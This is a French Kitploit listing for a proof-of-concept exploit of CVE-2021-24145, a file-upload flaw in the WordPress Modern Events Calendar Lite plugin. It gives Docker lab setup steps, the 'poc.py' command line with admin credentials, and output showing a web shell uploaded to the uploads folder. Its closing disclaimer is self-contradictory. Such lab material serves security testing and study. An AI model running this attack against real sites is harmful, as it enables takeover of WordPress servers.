Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-24145 — Vulnérabilité de téléchargement de fichiers WordPress, plugin Modern Events Calendar Lite pour WordPress avant la version 5.16.5 | Kitploit
Outils/GitHubGitHub/dnr6419/cve-2021-24145
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubdnr6419/cve-2021-24145

CVE-2021-24145

Vulnérabilité de téléchargement de fichiers WordPress, plugin Modern Events Calendar Lite pour WordPress avant la version 5.16.5

Voir le dépôt
324il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-24145

Vulnérabilité de téléchargement de fichier WordPress, plugin Modern Events Calendar Lite WordPress antérieur à 5.16.5 https://nvd.nist.gov/vuln/detail/CVE-2021-24145

Ordre d'installation et d'exécution

1. Installation de WordPress

Lors de l'installation, veuillez effectuer la redirection de port dans le fichier docker-compose.yml.

root@kitploit:~
 $ docker-compose up  

2. Installation initiale de WordPress et du plugin

Accédez à http://[web-server ip]:port/. Procédez à l'installation de base.
Allez dans [Plugins] -> [Add New] -> [Upload Plugin].
Téléchargez et installez modern-events-calendar-lite.5.16.2.zip.
L'écran ci-dessous montre l'installation du plugin terminée.
Une fois l'installation terminée, activez le plugin.

3. PoC

python3 poc.py -T [URL] -P [PORT] -U [Path] -u [admin] -p [password]

root@kitploit:~
 $python3 poc.py -T 172.30.1.48 -P 80 -U / -u 0ppr2s -p 123456

  ______     _______     ____   ___ ____  _      ____  _  _   _ _  _  ____
 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \| || | / | || || ___|
| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \
| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__   _| |__   _|__) |
 \____|  \_/  |_____|   |_____|\___/_____|_|    |_____|  |_| |_|  |_||____/

                * Wordpress Plugin Modern Events Calendar Lite RCE

                * @Hacker5preme

[+] Authentication successfull !

[+] Shell Uploaded to: http://172.30.1.48:80//wp-content/uploads/shell.php

image

Source

https://github.com/Hacker5preme/Exploits/tree/main/Wordpress/CVE-2021-24145

Avertissements

En cas d'exploitation illégale de la vulnérabilité ci-dessus, nous déclinons toute responsabilité légale.

Si vous exploitez illégalement les vulnérabilités ci-dessus, vous ne serez pas tenu responsable.

La version de Docker doit être mise à jour.

Télécharger l’outil